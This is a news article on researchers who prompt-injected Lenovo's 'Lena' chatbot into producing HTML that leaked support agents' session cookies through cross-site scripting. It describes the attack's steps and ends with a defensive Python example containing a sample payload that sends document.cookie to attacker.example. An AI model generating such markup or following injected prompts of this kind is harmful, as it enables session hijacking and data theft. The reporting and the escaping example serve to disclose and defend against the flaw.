- Researchers found a way to deceive Lena, Lenovo's AI chatbot
- Lena handed active session cookies over to the researchers
- Malicious prompts could be used for a wide variety of attacks
Lena, the ChatGPT-powered chatbot featured on the Lenovo website, could be manipulated into leaking privileged information, spilling company secrets, or even executing malware, using nothing more than a prompt, experts have warned.
Security researchers at Cybernews managed to obtain active session cookies belonging to human customer support agents, essentially taking over their accounts, gaining access to confidential data, and potentially reaching other parts of the corporate network.
“The discovery highlights multiple security problems: improper user input sanitization, improper chatbot output sanitization, the web server not verifying content produced by the chatbot, running unverified code, and loading arbitrary web content. This leaves many opportunities for cross-site scripting (XSS) attacks,” the researchers said in their report.
“Massive security oversight”
At the heart of the problem, they said, is the fact that chatbots are “people pleasers.” Without proper guardrails baked in, they will do what they are told, and they cannot distinguish a benign request from a malicious one.
In this case, the Cybernews researchers wrote a 400-word prompt asking the chatbot to generate an HTML response.
The response contained hidden instructions to load resources from a server under the attackers' control, along with instructions to send data harvested from the victim's browser.
They also stressed that, although their proof of concept resulted in the theft of session cookies, the end result could have been almost anything.
“This is not limited to stealing cookies. It may also be possible to execute some system commands, which could allow the installation of backdoors and lateral movement to other servers and computers in the network,” Cybernews explained.
“We didn’t try any of this,” they added.
After Cybernews notified Lenovo of its findings, it was told that the tech giant had “protected its systems”, without detail on exactly what was done to fix what the researchers called a “massive security oversight” with potentially devastating consequences.
The researchers urged all companies using chatbots to assume that all output is “potentially malicious” and act accordingly.
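That advice can be illustrated with a minimal sketch. The payload below is a hypothetical example of the kind of markup described in the report (the attacker URL and handler are assumptions for illustration, not the actual payload used): escaping the chatbot's reply before embedding it in the page turns would-be script injection into inert text.

```python
import html

# Hypothetical malicious chatbot output: markup that, if rendered
# verbatim, would pull a resource from an attacker-controlled server
# and forward the visitor's session cookie to it.
chatbot_reply = (
    '<img src="x" '
    'onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">'
)

# Treat the output as potentially malicious: escape it before it is
# inserted into the page, so the browser displays it as plain text
# instead of parsing it as an element with an event handler.
safe_reply = html.escape(chatbot_reply)

print(safe_reply)
# All '<', '>' and quote characters are now HTML entities, so no tag
# or inline handler can be injected into the rendered page.
```

Escaping on output is only one layer; the report also points to validating user input and restricting what content the page may load, which in practice pairs output encoding with a Content Security Policy.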